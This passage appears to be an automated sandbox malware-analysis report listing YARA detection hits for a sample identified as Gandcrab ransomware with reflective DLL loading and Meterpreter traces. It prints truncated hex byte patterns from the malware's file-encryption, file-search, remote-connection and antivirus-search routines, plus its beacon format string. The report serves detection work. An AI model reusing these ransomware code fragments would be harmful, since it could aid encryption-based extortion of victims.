04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
00000020.00000002.682007928.000000000FE72000.00000004.00000001.01000000.00000004.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
00000012.00000002.521001527.000000000FE72000.00000004.00000001.01000000.00000004.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
0000000E.00000002.457728648.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000001F.00000002.651985737.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000019.00000003.601841912.00000000036D0000.00000004.00001000.00020000.00000000.sdmp	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
00000019.00000003.601841912.00000000036D0000.00000004.00001000.00020000.00000000.sdmp	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
00000019.00000003.601841912.00000000036D0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000019.00000003.601841912.00000000036D0000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
00000019.00000003.601841912.00000000036D0000.00000004.00001000.00020000.00000000.sdmp	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
00000019.00000003.601841912.00000000036D0000.00000004.00001000.00020000.00000000.sdmp	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
00000008.00000003.419920296.00000000030F0000.00000004.00001000.00020000.00000000.sdmp	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
00000008.00000003.419920296.00000000030F0000.00000004.00001000.00020000.00000000.sdmp	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
00000008.00000003.419920296.00000000030F0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000008.00000003.419920296.00000000030F0000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
00000008.00000003.419920296.00000000030F0000.00000004.00001000.00020000.00000000.sdmp	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
00000008.00000003.419920296.00000000030F0000.00000004.00001000.00020000.00000000.sdmp	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
00000012.00000003.513687059.0000000003230000.00000004.00001000.00020000.00000000.sdmp	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
00000012.00000003.513687059.0000000003230000.00000004.00001000.00020000.00000000.sdmp	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
00000012.00000003.513687059.0000000003230000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000012.00000003.513687059.0000000003230000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
00000012.00000003.513687059.0000000003230000.00000004.00001000.00020000.00000000.sdmp	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
00000012.00000003.513687059.0000000003230000.00000004.00001000.00020000.00000000.sdmp	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
Process Memory Space: wThN5MTIsw.exe PID: 6388	HKTL_Meterpreter_inMemory	Detects Meterpreter in-memory	netbiosX, Florian Roth	0xdc63:$xs1: WS2_32.dll 0xf33:$xs2: ReflectiveLoader 0xf55:$xs2: ReflectiveLoader 0xa34d:$xs2: ReflectiveLoader 0xa36f:$xs2: ReflectiveLoader 0x16d19:$xs2: ReflectiveLoader 0x16d3b:$xs2: ReflectiveLoader
Process Memory Space: wThN5MTIsw.exe PID: 6388	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: wThN5MTIsw.exe PID: 6388	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: ssapst.exe PID: 6592	HKTL_Meterpreter_inMemory	Detects Meterpreter in-memory	netbiosX, Florian Roth	0xaf8f:$xs1: WS2_32.dll 0x38f0:$xs2: ReflectiveLoader 0x3912:$xs2: ReflectiveLoader 0xd781:$xs2: ReflectiveLoader 0xd7a3:$xs2: ReflectiveLoader 0x13fba:$xs2: ReflectiveLoader 0x13fdc:$xs2: ReflectiveLoader
Process Memory Space: ssapst.exe PID: 6592	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: ssapst.exe PID: 6592	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: ssapst.exe PID: 6840	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: ssapst.exe PID: 6840	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: ssapst.exe PID: 7028	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: ssapst.exe PID: 7028	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: ssapst.exe PID: 5668	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: ssapst.exe PID: 5668	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: ssapst.exe PID: 6104	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: ssapst.exe PID: 6104	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: ssapst.exe PID: 4292	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: ssapst.exe PID: 4292	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: ssapst.exe PID: 1416	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: ssapst.exe PID: 1416	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: ssapst.exe PID: 3588	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: ssapst.exe PID: 3248	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: ssapst.exe PID: 3248	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: ssapst.exe PID: 6228	HKTL_Meterpreter_inMemory	Detects Meterpreter in-memory	netbiosX, Florian Roth	0x2e43:$xs1: WS2_32.dll 0x4766:$xs1: WS2_32.dll 0x8322:$xs2: ReflectiveLoader 0x8344:$xs2: ReflectiveLoader 0x9b98:$xs2: ReflectiveLoader 0x9bba:$xs2: ReflectiveLoader 0xe8ad:$xs2: ReflectiveLoader 0xe8cf:$xs2: ReflectiveLoader
Process Memory Space: ssapst.exe PID: 6228	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: ssapst.exe PID: 6228	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: ssapst.exe PID: 5016	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: ssapst.exe PID: 7020	HKTL_Meterpreter_inMemory	Detects Meterpreter in-memory	netbiosX, Florian Roth	0x11fb9:$xs1: WS2_32.dll 0x5505:$xs2: ReflectiveLoader 0x5527:$xs2: ReflectiveLoader 0x6ffe:$xs2: ReflectiveLoader 0x7020:$xs2: ReflectiveLoader 0xa68b:$xs2: ReflectiveLoader 0xa6ad:$xs2: ReflectiveLoader
Process Memory Space: ssapst.exe PID: 7020	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: ssapst.exe PID: 7020	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: ssapst.exe PID: 7108	HKTL_Meterpreter_inMemory	Detects Meterpreter in-memory	netbiosX, Florian Roth	0x7215:$xs1: WS2_32.dll 0x8ac9:$xs1: WS2_32.dll 0x56d0:$xs2: ReflectiveLoader 0x56f2:$xs2: ReflectiveLoader 0x1274a:$xs2: ReflectiveLoader 0x1276c:$xs2: ReflectiveLoader 0x14465:$xs2: ReflectiveLoader 0x14487:$xs2: ReflectiveLoader
Process Memory Space: ssapst.exe PID: 7108	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: ssapst.exe PID: 7108	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: ssapst.exe PID: 204	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: ssapst.exe PID: 204	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: ssapst.exe PID: 4804	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: ssapst.exe PID: 4804	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: ssapst.exe PID: 5952	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: ssapst.exe PID: 1784	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: ssapst.exe PID: 1784	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: ssapst.exe PID: 5076	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: ssapst.exe PID: 5076	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: ssapst.exe PID: 5700	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: ssapst.exe PID: 5700	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Process Memory Space: ssapst.exe PID: 972	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
Click to see the 199 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
34.3.ssapst.exe.32a0000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xd992:$x1: ReflectiveLoader
34.3.ssapst.exe.32a0000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xd2fe:$: DECRYPT.txt 0xd364:$: DECRYPT.txt
34.3.ssapst.exe.32a0000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
34.3.ssapst.exe.32a0000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xd991:$s1: _ReflectiveLoader@ 0xd992:$s2: ReflectiveLoader@
34.3.ssapst.exe.32a0000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xcfc8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
34.3.ssapst.exe.32a0000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x3cf0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4161:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x55f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x30d3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6370:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
32.3.ssapst.exe.3790000.0.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
32.3.ssapst.exe.3790000.0.raw.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
32.3.ssapst.exe.3790000.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
32.3.ssapst.exe.3790000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
32.3.ssapst.exe.3790000.0.raw.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
32.3.ssapst.exe.3790000.0.raw.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
18.2.ssapst.exe.fe60000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
18.2.ssapst.exe.fe60000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
18.2.ssapst.exe.fe60000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
18.2.ssapst.exe.fe60000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
18.2.ssapst.exe.fe60000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
18.2.ssapst.exe.fe60000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
18.2.ssapst.exe.fe60000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 E6 0F 8B 35 44 A1 E6 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 E6 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 E6 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 E6 0F 8B 35 10 A1 E6 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 E6 0F C7 44 24 1C 64 F4 E6 0F C7 44 24 20 80 F4 E6 0F C7 44 24 24 A0 F4 E6 0F C7 44 24 28 BC F4 E6 0F C7 44 24 2C D8 F4 E6 0F C7 44 24 30 F0 F4 E6 0F C7 44 24 34 04 F5 E6 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 E6 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 E7 0F C7 45 B8 BC 03 E7 0F C7 45 BC ...
0.3.wThN5MTIsw.exe.3170000.0.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
0.3.wThN5MTIsw.exe.3170000.0.raw.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
0.3.wThN5MTIsw.exe.3170000.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0.3.wThN5MTIsw.exe.3170000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
0.3.wThN5MTIsw.exe.3170000.0.raw.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
0.3.wThN5MTIsw.exe.3170000.0.raw.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
35.0.ssapst.exe.fe60000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
35.0.ssapst.exe.fe60000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
35.0.ssapst.exe.fe60000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
35.0.ssapst.exe.fe60000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
35.0.ssapst.exe.fe60000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
35.0.ssapst.exe.fe60000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 E6 0F 8B 35 44 A1 E6 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 E6 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 E6 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 E6 0F 8B 35 10 A1 E6 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 E6 0F C7 44 24 1C 64 F4 E6 0F C7 44 24 20 80 F4 E6 0F C7 44 24 24 A0 F4 E6 0F C7 44 24 28 BC F4 E6 0F C7 44 24 2C D8 F4 E6 0F C7 44 24 30 F0 F4 E6 0F C7 44 24 34 04 F5 E6 0F ... 